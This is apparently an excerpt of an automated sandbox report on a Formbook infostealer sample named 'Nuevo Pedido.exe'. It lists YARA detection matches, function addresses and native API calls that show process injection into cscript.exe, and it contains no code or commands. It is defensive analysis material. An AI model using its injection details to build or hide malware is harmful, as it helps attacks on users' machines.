Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 0_2_00A85C24
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 0_2_02BC8250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 0_2_02BCD2F8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 0_2_05635AA0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 0_2_05635AB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_00401030
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_0041BC78
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_00408C7B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_00408C80
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_0041BD01
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_00402D90
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_0041BEE0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_00402FB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_0041CFB6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_00DE5C24
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BF900
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D4120
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A820A8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CB090
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A828EC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71002
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EEBB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7DBD2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A82B28
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A822AE
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E2581
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A825DD
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CD5E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A82D07
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B0D20
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A81D55
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C841F
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7D466
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A81FF1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A82EF7
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D6E30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7D616
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0478841F
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0483D466
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04770D20
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_048425DD
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04842D07
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0478D5E0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04841D55
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04796E30
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04842EF7
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0483D616
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04841FF1
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_048420A8
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_048428EC
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831002
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0478B090
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0477F900
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_048422AE
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0483DBD2
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04842B28
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047AEBB0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0061BC78
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_00608C7B
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_00608C80
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0061BD01
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_00602D90
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0061BEE0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_00602FB0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0061CFB6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: String function: 019BB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0477B150 appears 35 times
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_004185E0 NtCreateFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_00418690 NtReadFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_00418710 NtClose,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_004187C0 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_004185DA NtCreateFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_0041870C NtReadFile,NtClose,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_004187BA NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F98F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F95D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F99D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F98A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019FB040 NtSuspendThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019FA3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9A10 NtQuerySection,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F95F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019FAD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9560 NtWriteFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019FA710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019FA770 NtOpenThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9760 NtOpenProcess,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F96D0 NtCreateKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047BAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047BA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047BA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047BB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047BA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_006185E0 NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_00618690 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_00618710 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_006187C0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_006185DA NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0061870C NtReadFile,NtClose,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_006187BA NtAllocateVirtualMemory,
            Source: Nuevo Pedido.exe | Binary or memory string: OriginalFilename vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.242885207.0000000005EF0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.243408230.0000000006390000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
